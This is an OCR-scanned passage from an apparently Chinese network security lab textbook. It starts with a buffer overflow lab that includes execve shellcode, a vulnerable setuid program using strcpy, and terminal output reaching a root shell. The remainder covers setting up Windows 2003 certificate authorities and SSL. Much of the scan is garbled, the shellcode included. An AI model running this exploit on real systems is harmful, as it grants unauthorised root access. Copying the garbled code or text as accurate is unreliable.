[*********** Begin Of exe.c *eexaoeieeeeeieeek / 


#include <stdlib.h> 
#include <unistd.h> 


extern char **environ; 


int main(int argc, char **argv) { 

char large string[128]; 

long *long ptr - (long *) large string; 

int i; 

char shellcode[] = 
"\xeb\x1f£\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x8 9\x£3\x8d\x4e\x08\x8d\x5 6\x0c\xcd\x80\x31\xdb\x8 9\xd8\x40\xcd" 
"\x80\x31\xc0\xb0\x17\x31\xdb\xcd\x80\xe8\xd4\xff\xff\xff/bin/sh"; 


for (i = 0; i < 32; i++) 
*(long_ptr + i) = (int) strtoul(argv[2], NULL, 16); 
for (i = 0; i < (int) strlen(shellcode); i++) 
large_string[i] = shellcode[i]; 


setenv("KIRIKA", large string, 1); 
execle(argv[1], argv[1], NULL, environ); 


return 0; 


j 


/*>kkkkkkkkkkkkkkkkk END Of exe.c jeeeeeee f 
[*********** Begin of toto.cXeeeeeceeeeeeeek / 
#include <stdio.h> 
#include <stdlib.h> 


int main(int argc, char **argv) 


{ 


st 第 16 章 网 络 攻防 oe 
char buffer[96]; 


printf("- $p -\n", &buffer); 
strcpy(buffer, getenv("KIRIKA")); 


return 0; 


f 


[DOOR EAE END of teto.cIe f 


(3) 编译 代码 ， 并 设置 权限 。 
D 在 提示 符 下 输入 命令 编译 源 文件 ， 如 图 16-39 所 示 。 


[is@localhost is]$ gcc exe.c -0 exe 
[is@localhost is]$ gcc toto.c -o toto 


图 16-39 ”编译 源 文件 
Q) 切换 到 root 用 户 ， 并 修改 权限 ， 如 图 16-40 所 示 。 


[is@localhost is]$ su 

Password: 

[root@localhost is]# chown root.root toto 

[root@localhost is]# chmod +s toto 

[root@localhost is]# 1s -1 exe toto 

-ruxr-xr-x — 1 is is 11871 Jul 26 20:20 exex 
-rusr-sr-x 1 root root 11269 Jul 26 28:28 totox 
[root@localhost is]# exit 


图 16-40 在 root 下 修改 权限 
G 回 到 普通 用 户 ， 并 用 “whoami” 查 看 当前 身份 ， 如 图 16-41 所 示 。 


[is@localhost is]$ whoami 
is 


图 16-41 查看 当前 身份 
@ 运行 缓冲 区 溢出 程序 “exe”， 并 修改 偏 移 量 以 获取 root 权限 ， 如 图 16-42 所 示 。 


[is@localhost is]$ ./exe ./toto OxbffFFFFF 
- Bxbffffc38 - 

Segmentation fault 

[is@localhost is]$ ./exe ./toto üxbffffc38 
- Bxbffffc38 - 

bash# whoami 

root 

bash# 


图 16-42 获取 root 权限 
【实验 报告 】 
详细 描述 实验 过 程 ， 根 据 提供 代码 分 析 缓 冲 区 溢出 攻击 的 关键 技术 。 


【思考 题 】 
根据 缓冲 区 溢出 攻击 的 原理 ， 分 析 如 何 防范 缓冲 区 溢出 攻击 。 
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第 17 3E 
认证 服务 


本 章 介 绍 PKUCA 系统 及 SSL 的 应 用 , 一 次 性 口令 系统 及 认证 、 授权 和 记 账 CAAA) 
服务 的 RADIUS 协议 相关 的 安全 实验 。 


171 PKI/CA 系统 及 SSL 的 应 用 


17.1.1 Windows 2003 Server 环 境 下 独立 根 CA 的 安装 及 使 用 


【实验 目的 】 
加 深 对 CA 认证 原理 及 其 结构 的 理解 , 掌握 在 Windows 2000/2003 环境 下 独立 根 CA 
的 安装 和 使 用 。 
【实验 环境 】 
- 台 安 装 Windows 2003/2000 Server 操作 系统 的 计算 机 以 及 与 其 联网 的 一 台 
Windows 2000/XP 计算 机 。 


【实验 步 又 】 
1. 独立 根 CA 的 安装 
(1) 选择 【开始 】|【 控 制 面板 】| 【添加 和 删除 程序 】 命 令 ， 在 弹出 窗口 中 选择 【 深 
加 和 删除 Windows 组 件 】 在 【组 件 】 列 表 框 中 选择 【证 书 服务 】 再 单 击 【 下 一 步 】 按 
钮 ， 如 图 17-1 所 示 。 
ET 


indows Sft 
可 以 添加 或 删除 Windows 的 组 件 。 


Se ree 


HO: 
E 35m al 
EEE 0.0 MB 

口 郊 终 端 服务 器 授权 0.9 mB E 


E 安装 证 书 颁发 机 构 CA EBSTPRUEDSIET- 2498199. 


Kew: 35m 
可 用 磁盘 空间 : 6524.6 Mb seem o»... | 


图 17-1. 选择 安装 Windows 证 书 服务 组 件 


FF RS 
(2) 在 弹出 的 选择 窗口 中 ， 选 择 【 独 立根 CA]】 单 选 按钮 ， 单 击 【下 一 步 】 按 钮 ， 
如 图 17-2 所 示 。 


Pinaows 组 件 向 导 


图 17-2 ”选择 证 书 颁发 机 构 类 型 


(3) 在 弹出 窗口 中 按 要 求 依次 填 入 CA 所 要 求 的 信息 ， 单 击 【 下 一 步 】 按 钮 ， 如 
17-3 所 示 。 


Yindors GLE 


17-3 ”填写 CA 标识 信息 


(4) 继续 选择 【证 书 数据 库 】、【 证 书 数据 库 日 志 】 和 配置 信息 的 安装 、 存 放 路 径 ， 
如 图 17-4 所 示 。 单 击 【 下 一 步 】 按 钮 ， 完 成 安装 。 

G) 选择 【开始 】| 【程序 】| 【管理 工具 】 命 令 ， 可 以 找到 【证 书 颁发 机 构 】， 说 明 
CA 的 安装 已 经 完成 ， 如 图 17-5 所 示 。 


mum 255 m= 
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Pindors PAS 


ad 
证 书 数 据 库 设置 

输入 证 书 数据 库 、 证 书 数据 库 日 志和 配置 信息 的 位 置 。 | (+) 
证 书 数据 库 日 志 O): 
[D: WINDOWS \systend2\Cer tLog pase Ww)... 
v deBoEHR ire ett sree (8) 

共享 文件 夹 0D ; 

pets ———————————— EG... 


T: (8EBUBRUUETSES EE E 


Lx | wm | 


图 17-4 数据 存储 位 置 


ft NET Framework 1 1 配置 
ft MET enerock 11S 


r tenh 


图 17-5 管理 工具 中 的 证 书 颁发 机 构 
2. 通过 Web 页 面 申 请 证 书 


a) 从 同一 局 域 网 中 的 另外 一 台 计 算 机 开启 正 浏 览 器 ,输入 http:/ 根 CA 的 IP/certsrv， 
其 中 IP 指 的 是 建立 根 CA 的 服务 器 IP 地 址 。 出 现 如 图 17-6 所 示 的 页 面 ， 选 择 【 申 请 一 
个 证 书 】 链 接 。 


(2) 在 弹出 的 页 面 中 选择 【Web 浏览 器 证 书 】 链 接 ， 如 图 17-7 所 示 。 
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使 用 此 网 站 为 你 的 Web HRE, bt get rir rh PP 通过 使 用 证 书 ， 您 可 以 向 通过 Web 通信 的 人 确认 您 的 身价 , = 
署 并 加 宅地 件 ， 并 且 ， 根 据 低 申 请 的 证 书 的 法 型 ， 执 行 其 他 安全 任 : 


嫩 也 可 以 使 用 此 网 站 下 载 证 书 额 发 机 构 (CA) 证 节 ， 证 书 链 ， 式 证书 吊 销 列表 (CRL) ， 或 查看 挂 起 的 申请 的 状态 
有 关 证 书 服务 的 详细 信息 ， 请 参 间 证 书 服务 文档 . 
选择 一 个 任务 : 

[T 

二 看 六 相约 证 书 申请 的 拟态 

下 载 一 个 ch ER. ERAR CRL 


wee TOT E aene 
图 17-6 ”证书 服务 页 面 


或 者 ， 提 交 一 个 WÜUSTA. 


4 
gesunde uu ea ts ee 


图 17-7 证 书 申请 类 型 


G) 在 弹出 的 窗口 中 填写 用 户 的 身份 信息 ， 完 成 后 进行 提交 。 在 此 种 情况 下 ， 正 浏 
览 器 采用 默认 的 加 密 算法 生成 公 钥 对 ， 私 钥 保存 在 本 地 计算 机 中 ， 公 钥 和 用 户 身 份 信息 
按照 标准 的 格式 发 给 CA 服务 器 ， 然 后 出 现 如 图 17-8 所 示 的 提示 ， 单 击 【 是 】 按 钮 ， 弹 
出 如 图 17-9 所 示 的 页 面 。 
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cb AMET 一 识别 信息 
要 完成 您 的 证 书 ， 在 下 画 的 西 中 输入 要 求 的 信息 。 


省 : RE 


ERAR: EN 71 By EE OE Mus 
E E 再 四 
RED 
g 
EEEE TTT FT O itere 


图 17-8 填写 用 户 的 身份 信息 


ET ,oft 证书 服务 Riereseft T 
THO MAD SEO (mo 


Reb 浏览 器 证 书 - 识别 信息 


要 完成 你 的 证 书 ， 丰 下面 的 醒 中 输入 要 求 的 信息 。 
sapo o ooo 
[aexemgié3com | 


‘university 


加 家 tb 区 :EN 
正在 生成 申请 
Bn o 


Brea. TOT TTT ep interet 
图 17-9 等 待 CA 服务 器 回应 
(4) CA 服务 器 响应 后 ， 弹 出 证 书 申 请 成 功 页 面 。 
3. 证 书 发 布 
(1) 在 根 CA 所 在 的 计算 机 上 ， 选 择 【 开 始 】| 【程序 】| 【管理 工具 】| 【证书 颁发 机 
构 】 命 令 。 然 后 在 窗口 左 侧 选 择 【 挂 起 的 申请 ])， 上 面 申 请 的 证 书 便 会 出 现在 窗口 右 侧 ， 
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如 图 17-10 所 示 。 


K 17-10 挂 起 的 申请 证 书 


(2) 选择 一 个 证 书 并 右 击 ， 选 择 【 所 有 任务 】|【 颁 发 】 命 令 ， 进 行 证 书 颁 发 ， 如 
图 17-11 所 示 。 


图 17-11 颁发 证 书 
(3) 证 书 颁发 后 将 从 【 挂 起 的 申请 】 文 件 夹 转 入 【颁发 的 证 书 】 文 件 夹 中 ， 表 示 证 


mum 259 mm 
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书 颁发 完成 ， 如 图 17-12 所 示 。 


XO BFO SSO OD 
mm 2 
Eran 
ga 


Ca minei 
3 S 


a 
rd 
C < 的 中 请 


本 | 2 


图 17-12 证书 颁发 完成 


4. 证 书 的 下 载 安装 
(1) 在 申请 证 书 的 计算 机 上 打开 IE， 输 入 http:// 根 CA 的 IP/certsrv， 进 入 证 书 申请 
页 面 。 选 择 【 查 看 挂 起 的 证 书 申请 的 状态 】 链 接 ， 如 图 17-13 所 示 。 


Bric e 
XEO p SEO (mo IAD 


使 用 此 网 站 为 您 的 Web RIRE, PAE Dust REAM. RAE, STAGE Web 通信 的 人 确认 您 的 身份 ， 签 
车 并 加 密 邮 件 ， 并 且 ， 根 据 您 申请 的 证 书 的 类 型 ， 执 行 其 他 安全 任务 


您 也 可 以 使 用 此 网 站 下 载 证 书 贫 发 机 构 (CA) 证 蔬 ， 证 书 村 ， 或 证 书 吊销 列表 (CRL)， 或 查看 挂 起 的 申请 的 状态 、 
有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文 区 . 
WHE MES: 

申请 一 个 证 韦 


到 
a TOT TTT mne 


图 17-13 查看 挂 起 的 证 书 
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认证 服务 m 
(2) 在 弹出 的 页 面 中 选择 一 个 已 经 提交 的 证 书 申请 ， 如 图 17-14 所 示 。 


remm 


ft 证 书 服务 - Wicreze 


文件 中 REV SEO GMW Lj 
Ore’ -O-F 8 G| Ome cee e|c- s 

HE D [e] stte 7/172 30 0 257 car terv/esrteipn enm ERICH 
microsoft EHRE — lb E ^ 
查看 挂 起 的 证 书 申请 的 状态 

"EMT ae 


TFT T T Ip stem 


图 17-14 选择 已 经 提交 的 证 书 申请 
(3) 如 果 颁 发 机 构 已 颁发 证 书 ， 则 会 弹出 如 图 17-15 所 示 的 页 面 


IHO MMD SFU BRO IAD WH 
Orie - 2- PETAR eee 


证 书 已 颁发 


ERREBOTE. 
seus 


E TT fa iere 


图 17-15 证书 已 颁发 页 面 


(4) 单 击 【安装 此 证 书 】， 系 统 提示 如 图 17-16 所 示 。 单 击 【 是 】 按 钮 ， 系 统 弹出 证 
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书 安装 完成 页 面 。 


证 书 已 颁发 


您 申请 的 证 书 已 策 发 给 您 。 
es ented 


B 
B E kas 


图 17-16. 安装 证 书 


C5) 现在 验证 此 CA 系统 颁发 的 证 书 是 否 可 信任 ， 为 此 需要 安装 CA 系统 的 根 证 书 ， 
TE IE 浏览 器 地 址 栏 中 输入 http:// 根 CA 的 IP/certsrv, 进入 证 书 申请 页 面 。 选 择 当前 的 CA 
证 书 进 行 下 载 ， 并 保存 到 合适 的 路 径 ， 如 图 17-17 所 示 。 


下 载 CA 证 书 、 证 书 链 或 CRL 
槛 信任 从 这 个 证 书 颁 发 机 构 颁 发 的 证 书 ， 安 装 此 CA 证 书 链 。 


要 下 载 一 个 CA ERB. UEBER CR. RRA, 
ca 证 书 ; 


17-17 下 载 CA 根 证 书 


m= 262 一 
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(6) 下 载 完毕 后 ,在 证 书 保存 目录 中 查看 证 书信 息 ， 如 图 17-18 所 示 。 然 后 单 击 【 安 
装 证 书 】 按 钮 ， 进 入 证 书 导入 向 导 ， 按 照 默 认 设 置 完 成 证 书 的 导入 ， 导 入 成 功 后 ， 单 击 
【确定 】 按 钮 。 


2x) 
an “| 详细 信息 | 证 书 路 径 | 
E] usan 
这 个 证 书 的 目的 如 下 - 


“* 所 有 颁发 策略 
* 所 有 应 用 程序 策略 


颁发 给 : lab 


颁发 者 : led 


有 效 起 始 日 期 2005-12-13 到 2010-12-13 


EET] cem] 


图 17-18 ”证书 信息 


【实验 报告 】 
写 出 Windows 2003 Server 环境 下 独立 根 CA 的 配置 及 应 用 的 过 程 , 将 重要 步骤 截图 


【思考 题 】 
查阅 相关 资料 ， 完 成 在 Linux 操作 系统 下 独立 根 CA 的 配置 及 应 用 。 


17.1.2 ”企业 根 CA 的 安装 和 使 用 


【实验 目的 】 

加 深 对 CA 认证 原理 及 其 结构 的 理解 , 掌握 在 Windows 2000/2003 环境 下 企业 根 CA 
的 安装 和 使 用 。 

【实验 环境 】 

一 台 安 装 Windows 2003/2000 Server 操作 系统 的 计算 机 以 及 与 其 联网 的 一 台 
Windows 2000/XP 计算 机 。 


【实验 步 又 】 

1. 企业 根 CA 的 安装 

(1) 如 果 已 经 安装 了 独立 根 CA， 则 在 【添加 和 删除 Windows 组 件 】 中 ， 将 弹出 窗 
口中 的 【证 书 服务 】 选 项 去 掉 ， 删 除 原来 安装 的 CA. 

(2) 在 安装 企业 根 CA 前 ， 启 动 Active Directory 用 户 和 计算 机 项 。 选 择 【 开 始 】| 
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UF] | (FETA) | [Active Directory 用 户 和 计算 机 】 命 令 ， 操 作 无 误 弹出 如 图 17-19 
所 示 的 窗口 ， 服 务 启动 正确 。 


保存 的 查询 
Hj headquarters. example. micro: f BP 
EH Builtin 
EC Computers 


图 17-19 Active Directory 用 户 和 计算 机 


如 果 没 有 弹出 该 窗口 , 则 检查 是 否 运行 有 防火 墙 程序 , 如 有 则 关闭 防火 墙 : 如 果 【 管 
理工 具 】 中 没有 该 选项 ， 则 打开 【控制 面板 】| 【管理 工具 】| 【配制 服务 ]， 配 制 该 选项 。 

Go 打开 【添加 和 删除 Windows 组 件 】 面 板 ， 选 中 【证 书 服务 】 单 击 【下 一 步 】 
按钮 ， 再 次 安装 此 服务 。 在 弹出 窗口 中 选择 【企业 根 CA】 单 选 按钮 ， 如 图 17-20 所 示 ， 
单 击 【下 一 步 】 按 钮 。 


Tindows 钥 件 向 导 


图 17-20 ”选择 证 书 颁发 机 构 类 型 
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(4) 以 下 步骤 与 独立 根 CA 的 安装 相同 ， 请 参考 完成 安装 。 

2. 在 企业 根 CA 模式 下 以 Web 方式 申请 和 安装 证 书 

(1) 在 已 加 入 域 的 客户 端 打开 IE， 输 入 http: // 根 CA 的 IP/certsrv， 打 开 证 书 申请 
页 面 ， 选 择 【 用 户 证 书 】， 则 会 弹出 如 图 17-21 所 示 的 页 面 。 然 后 单 击 【提交 】 按 钮 ， 系 
统 弹 出 页 面 提 示 安 装 证 书 ， 如 图 17-22 所 示 。 


不 外 要 进一步 的 识 则 信息 。 BERENT, WA”. 
ET 


证 书 已 颁发 
您 申请 的 证 书 已 矣 发 给 你。 
Ears 


oen gig 
图 17-22 ”申请 证 书 已 颁发 


(2) 选择 【安装 此 证 书 】 如 果 此 时 CA 根 证 书 并 未 下 载 到 本 地 计算 机 ， 则 会 出 现 如 
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图 17-23 所 示 的 提示 页 面 。 


ee TAD Lr a 
l zi pne «Rx Le e 


证 书 已 后 发 
您 中 请 的 证 书 已 颁发 给 您。 


人 一 一 一 一 aa 
图 17-23 ”询问 根 证 书 


G) 单 击 【 是 】 按 钮 ， 完 成 根 CA 证 书 的 安装 。 

(4) 接 下 来 检查 根 CA 证 书 是 否 安装 。 在 【运行 】 中 输入 “mmc”， 打 开 控制 台 ， 单 
击 【 文 件 】 民 添 加 /删除 管理 单元 】 Se Dn 选中 【证 书 】， 单 击 【添加 ]| 【完成 】 
代 关 闭 】 代 确定 】 按 钮 。 在 【控制 台 根 节点 】 下 的 【证 书 】 中 选择 【受信 任 的 根 证 书 颁 
发 机 构 】| 【证书 ]， 即 可 看 到 安装 的 labl 的 根 证 书 ， 如 图 17-24 所 示 。 


i [ITXT TTD] 
DD REA FEV KARO BOW HHW 
e» oms à|x (3| 


国 控制 台 根 节点 
BÉ) 证书 - 当前 用 户 (S]Entrust.net Secure Server ... Entrast nat Secure Server Ce. 2019-5-26 
BTA Equifax Secure Certificate... Equifax Secure Certificate A. 2018-8-23 E 


Equifax Secure eBusiness CA-1 Equifax Secure eBusiness CA-1 2020-6-21 安全 | 
[Equifax Secure eBusiness CA-2 Equifax Secure eBusiness CA-2 2019-6-23 安全 | 
Equifax Secure Global eBus... Equifax Secure Global epusin 2020-6-21 Exi 
[EUnet International Root CA EUnet International Root CA 2018-10-2 安全 | 


E C 受信 任 的 根 证 书 颁发 机 构 
证 书 


EsTE, Public Notary Certs FESTE, Public Notary Certs 2020 安全 | 
sa yh [EFESTE, Verified Certs FESTE, Verified Certs 2020- 安全 | 
i - E NO First Data Digital Certifi... First Data Digital Certifica.. 2019 服务 | 
由 C) 受信 任 人 Brut clase 2 CA FWIT Clase 2 CA 2019-3-18 安全 | 
oO 证 书 注册 申请 国 qobusim Root CA GlobalSign Root CA 2014-1-28 安全 | 


BTE CyberTrust Global Root GTE CyberTrust Global Root 2018-8-14 安全 | 
Bere CyberTrust Root GTE CyberTrust Root 2004-4-4 安全 
Bore CyberTrust Root GTE CyberTrust Root 2006-2-24 安全 | 
国 hetp://mn valicert. con/ http://www. valicert. con/ 2019-6-26 zA 
http: /fem valicert. com/ http://www. valicert. com/ 2019-6-26 安全 | 
国 http://mm.valicert com/ http://www. valicert. conf 2019-6-26 安全 | 
ss sexviones IPS SERVIDORES 2009-12-30 安全 | 


Gia lebl 2010-12-13 《所 有 
Wicrosoft Authenticode (ta)... Microsoft Authenticode (tm) R.. 2000-1-1 安全 1 
Microsoft Root Authority Microsoft Root Authority 2020-12-31 《所 有 


Microsoft Root Certificate. Microsoft Root Certificate A 2021-5-10 SiR 
Se nit menm uzjl 
* 


E1724 已 安装 的 根 证 书 
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3. 在 企业 根 CA 模式 下 从 控制 台 申 请 和 安装 证 书 
CD 对 于 处 在 同一 个 域 里 的 计算 机 ， 除 了 利用 上 述 的 Web 方式 申请 证 书 外 ， 还 可 利 
用 如 图 17-24 所 示 的 控制 台 界面 申请 。 右 击 【 个 人 】 文 件 夹 , 在 【所 有 任务 】 中 选择 【 申 
请 新 证 书 】 弹出 【证 书 申 请 向 导 】 对 话 框 ， 利 用 此 向 导 到 根 CA 中 申请 证 书 ， 单 击 【下 
一 步 】 按 钮 ， 弹 出 如 图 17-25 所 示 的 对 话 框 。 选 中 【高 级 】 复 选 框 ， 根 据 申 请 证 书 的 用 
途 选择 证 书 类 型 后 ， 单 击 【 下 一 步 】 按 钮 。 


17-25 证书 类 型 
(2) 在 系统 弹出 的 对 话 框 中 选择 默认 加 密 程序 ， 单 击 【 下 一 步 】 按 钮 ， 弹 出 页 面 如 
图 17-26 所 示 。 单 击 【 浏 览 】 按 钮 ， 选 择 颁发 证 书 的 CA 为 labi 的 根 证 书 ， 单 击 【 下 一 
步 】 按 钮 。 


图 17-26 证书 颁发 机 构 
G) 系统 弹出 页 面 要 求 输入 名 称 ， 按 照 提 示 录 入 ， 如 图 17-27 所 示 。 
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证 书 申请 向 导 E xj 


记 的 名 称 和 描述 
您 可 以 提供 名 称 和 描述 ， 以 便 快 速 识别 某 个 证 书 。 


为 新 证 书 键入 好 记 的 名 称 和 描述 。 
好 记 的 名 称 E): 
pi 


tei ©): 


abs experiment 


mn | 
图 17-27 证 书 名 称 以 及 描述 


(4) 单 击 【下 一 步 】 按 钮 ， 在 弹出 窗口 中 单 击 【 完 成 】 按 钮 ， 如 图 17-28 所 示 。 
G) 接着 弹出 证 书 申请 成 功 对 话 框 ， 如 图 17-29 所 示 。 

meaag a xi 
正在 完成 证 书 申请 向 导 


您 已 成 功 地 完成 了 证 书 申请 向 导 . 


yl 

Administrator 
构 labi 

证 书 模板 EFS 故障 恢复 代理 

CSI Microsoft Enhanced Cryptograph 

证 书 申请 向 导 xi 

à) 证 书 申请 成 功 。 


图 17-28 ”证书 申请 完成 图 17-29 证 书 申请 成 功 
(6) 转 到 证 书 保存 目录 下 ， 证 书 已 经 安装 到 证 书库 中 ， 如 图 17-30 所 示 。 
【实验 报告 】 


写 出 Windows 2003 Server 环境 下 企业 根 CA 的 配置 及 应 用 的 过 程 , 将 重要 步骤 截图 
并 保存 。 


【思考 题 】 
查阅 相关 资料 ， 完 成 在 Linux 操作 系统 下 企业 根 CA 的 配置 及 应 用 。 
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RUG - [控制 台 根 节点 \ 证 书 - 当 首 用 户 \ 个 人 \ 证 书 ] E RE! 
fb xe MO SEV RERO WI) ha | etes] 
SEE | STS 
E 
SES - 当前 用 户 
SAM CES eee 
airs 2008-12-12 ”文件 前 障 恢 复 E 
c CHRIS Gli 2007-12-13 SAFRAS 
oO 企业 信任 E 2008-12-13 Microsoft (REE... > 
sO Pa ied 2007-12-13 。 文件 圾 随 饮 复 ri 
8 Cl Active Dir lel 2001-12-13 文件 故障 恢复 E> 
? a ae Lab 2006-12-13 PHA E 
aO 第 三 方 根 证 书 是 发 机 构 
田 国 受信 
aO 证 书 注册 中 请 
EE E] 到 
f PÄ 存储 合 有 84 MER. 


图 17-30 ”申请 的 证 书 被 安装 到 证 书库 


17.1.3 ”证书 服务 管理 器 


【实验 目的 】 
掌握 证 书 服务 的 管理 ， 包 括 如 何 启动 和 停止 证 书 服务 、CA 的 备份 与 还 原 以 及 证 书 
的 废除 。 


【实验 环境 】 
- 台 安 装 Windows 2003/2000 Server 操作 系统 的 计算 机 以 及 与 其 联网 的 一 台 
Windows 2000/XP 计算 机 。 


【实验 步骤 】 

1. 停止 /启动 证 书 服 

从 【程序 】|【 管 理工 具 】 中 打开 【证 书 颁 发 机 构 】 右 击 CA 公共 名 称 节 点 ， 这 里 
是 labl， 在 【所 有 任务 】 中 选择 【停止 服务 ]， 即 可 停止 证 书 服务 ， 在 同样 操作 中 ， 选 择 
【启动 服务 】 则 可 开启 服务 ， 如 图 17-31 所 示 。 

2. CA 备份 /还 原 

同上 述 操作 ， 选 择 【 备 份 CA】， 则 进入 【证 书 颁 发 机 构 备份 向 导 】 单 击 【下 一 步 】 
按钮 ， 弹 出 如 图 17-32 所 示 的 备份 项 目 对 话 框 ， 选 择 要 备份 的 项 目 和 文件 夹 ， 单 击 【下 
一 步 】 按 钮 。 

为 了 保护 私 钥 的 安全 性 ， 必 须 输入 保护 私 钥 和 证 书 文件 的 密码 ， 如 图 17-33 所 示 。 
单 击 【 下 一 步 】 按 钮 ， 单 击 备份 向 导 中 的 【完成 】 按 钮 ， 即 可 完成 CA 备份 。 
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图 17-31 停止 CA 服务 


ut DR UL OD AES 


要 备份 的 项 目 
您 可 以 备份 证 书 颁发 机 构 数据 的 单个 组 件 。 


17-33 ”保护 私 钥 和 证 书 文 件 的 密码 


mmm 270 m 
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CA 的 还 原 操作 需要 先 停止 CA 服务 ， 然 后 右 击 CA 公共 名 称 节点 ， 在 【所 有 任务 】 
中 选择 【还 原 CA】， 即 进入 【证 书 颁发 机 构 还 原 向 导 】)， 单 击 【下 一 步 】 按 钮 。 弹 出 如 
图 17-34 所 示 的 选择 还 原 项 目 对 话 框 ， 选 择 要 还 原 的 项 目 和 证 书 文件 所 在 的 文件 夹 ， 单 
击 【 下 一 步 】 按 钮 。 根 据 提示 输入 保护 私 钥 和 证 书 文件 的 密码 ， 就 是 CA 备份 时 所 设置 
的 密码 ， 然 后 单 击 【 下 一 步 】 按 钮 ， 单 击 还 原 向 导 中 的 【完成 】 按 钮 ， 即 可 完成 CA 
还 原 。 

= 


EEIUENS DH TH. 


选择 要 还 原 的 项 目 : 
Tv HRM CA EBO 
Tv. 证 书 数 据 库 和 证 书 数据 库 日 志 © 


从 这 个 位 置 还 原 QD 
[wm | 
人 然后 ， 选 择 后 


omm | 


图 17-34. 选择 还 原 项 目 对 话 杠 


3. 证 书 废除 
右 击 【 颁 发 的 证 书 】 中 需要 废除 的 证 书 ， 在 弹出 菜单 中 的 【所 有 任务 】 下 选择 【 吊 
销 证 书 】， 如 图 17-35 所 示 。 


ee 
HD MEW BEY MOD 
eae eee) 


2006-12-13 
2006-12-13 
2006-12-13 
2006-12-13 
2005-12-20 
2006-12-13 
2007-12-13 


2007-12-13 
2007-12-13 
2007-12-13 


图 17-35 “吊销 证 书 
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在 系统 弹出 对 话 框 中 选择 吊销 理由 后 ， 单 击 【 是 】 按 钮 ， 则 可 看 到 被 废除 的 证 书 转 
移 到 【吊销 证 书 】 目 录 下 ， 如 图 17-36 所 示 。 
4. 证 书 吊销 列表 的 创建 xl 
这 里 可 以 创建 一 个 吊销 列表 以 便 把 吊销 的 证 moore mmm. 
书 对 外 发 布 ， 以 供 客户 端 下 载 查 询 。 右 击 【吊销 的 。 mea: 


证 书 】 文 件 夹 ， 在 【所 有 任务 】 中 选择 【发 行 】 yo 
然后 在 弹出 的 对 话 框 中 选择 [新 的 CRL] 单 选 按 外， 一 一 
然后 单 击 【 确 定 】 按 钮 ， 如 图 17-37 所 示 ， 即 可 完 dd eee 


成 证 书 吊 销 列表 的 创建 和 发 布 。 然 后 查看 创建 的 证 书 吊 销 列表 ， 右 击 【 吊 销 的 证 书 】 文 
件 夹 , 单 击 弹出 菜单 中 的 【属性 】 弹出 【吊销 的 证 书 属性 】 窗 口 ,， 单 击 【查看 当前 CRL], 
系统 弹出 【证 书 吊销 列表 】 对 话 框 ， 如 图 17-38 所 示 。 


证 书 吊销 列表 RES] 


Tabi, headquarters, exe 
Braam 20055512 B 13H. 17:37:32 
园 下 一 次 的 更 新 2005 年 12 月 21 日 5:57:32 
Brams shalBSA 

ET. KeyID=58 fc e0 cO 9T cf 9b. 


x 
Pea E MODE CXD TANG 在 当前 CRL ZH, PORE 


Ica 版 本 wo 
lcaL 数字 3 
205412 RINA 17:47-37. 


发 布 一 个 完整 的 CRL， 它 包含 此 CA 的 景 新 的 吊销 信息 。 


C thi cLa) 
发 布 CRL 的 简化 版 本 ， 它 只 包含 CRL 最 近 一 次 发 布 后 的 更 新 。 


ae | o» | 


图 17-37 发布 新 的 CRL 图 17-38 【证 书 吊销 列表 】 对 话 杠 


【实验 报告 】 

(OD 写 出 启动 和 停止 证 书 服务 的 步 又 。 

(2) 写 出 CA 的 备份 与 还 原 的 步骤 。 

G) 写 出 证 书 废除 的 步骤 。 

(4) 将 上 述 步 骤 截 图 并 保存 。 

【思考 题 】 

查阅 相关 资料 ， 完 成 在 Linux 操作 系统 下 证 书 服务 器 的 管理 。 


17.1.4 基于 Web 的 SSL 连接 设置 


【实验 目的 】 
通过 学 习 、 实 践 基 于 Web 的 SSL 连接 设置 ， 加 深 对 SSL 的 理解 。 
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【实验 环境 】 
一 台 安 装 Windows 2003/2000 Server 操作 系统 的 计算 机 以 及 与 其 联网 的 一 台 
Windows 2000/XP 计算 机 。 


【实验 步 又 】 

1. 为 Web 服务 器 申请 证 书 

CD 单 击 【 开 始 】| 【程序 】| 【管理 工具 】|【IIS (Intemet 信息 服务 ) 管理 器 〗 在 弹出 
窗口 中 右 击 【 默 认 网 站 】)， 在 弹出 的 快捷 菜单 中 选择 【属性 】 选 项 ， 如 图 17-39 所 示 。 


I aloj xj 


17-39 ”打开 默认 Web 站 点 属性 


(2) 在 弹出 的 对 话 框 内 选择 【目录 安全 性 】 选 项 卡 ， 单 击 【安全 通信 】 中 的 【服务 
器 证 书 】 按 钮 ， 如 图 17-40 所 示 。 


17-40 BRU Web 站 点 属性 


mm 273 =m 


G) ski [rS 证 书 向 导 】 对 话 框 ， 选 中 【新 建 证 书 】 单 选 按钮 ， 单 击 【 下 一 步 】 按 
钮 ， 如 图 17-41 所 示 。 


17-41 选择 网 站 分 配 证 书 方法 


(4) 在 弹出 对 话 框 中 填写 证 书 名 称 及 加 密 位 长 信息 , 单 击 [ 下 一 步 ] 按 钮 , 如 图 17-42 
所 示 。 


图 17-42 ”填写 证 书 名 称 及 加 密 位 长 信息 
(5) 在 弹出 对 话 框 中 填写 单位 信息 ， 单 击 【 下 一 步 】 按 钮 ， 如 图 17-43 所 示 。 
(6) 在 弹出 对 话 框 中 填写 公用 站 点 名 称 信息 ， 单 击 【 下 一 步 】 按 钮 ， 如 图 17-44 
所 示 。 


CD 在 弹出 对 话 框 中 填写 地 理 信息 ， 单 击 【 下 一 步 】 按 钮 ， 如 图 17-45 所 示 。 


一 274 一 
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图 17-45 ”填写 地 理 信息 


mm 275 mm 
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(8) 在 弹出 对 话 框 中 填写 证 书 请 求 文件 名 称 ， 单 击 【 下 一 步 】 按 钮 ， 如 图 17-46 
所 示 。 


图 17-46 ”填写 证 书 请 求 文件 名 称 


(9) 弹出 【请 求 文件 摘要 】 对 话 框 ， 确 认 后 单 击 【 下 一 步 】 按 钮 ， 接 着 单 击 【 完 成 】 
按钮 ， 完 成 服务 器 端 证 书 配 置 ， 如 图 17-47 所 示 。 


图 17-47 【请 求 文件 摘要 】 对 话 框 


2. 提交 Web 服务 器 证 书 

(1) 打开 服务 器 TE 浏览 器 ， 输 入 地 址 http:/ 根 CA 的 IP/certsrv， 如 图 17-6 所 示 。 在 
出 现 的 网 页 上 选择 【申请 一 个 证 书 】 

(2) 在 出 现 的 网 页 中 选择 【高 级 证 书 申请 】〗 如 图 17-48 所 示 。 

G) 在 出 现 的 网 页 中 单 击 第 二 个 选项 【使 用 base64 编码 ]， 如 图 17-49 所 示 。 
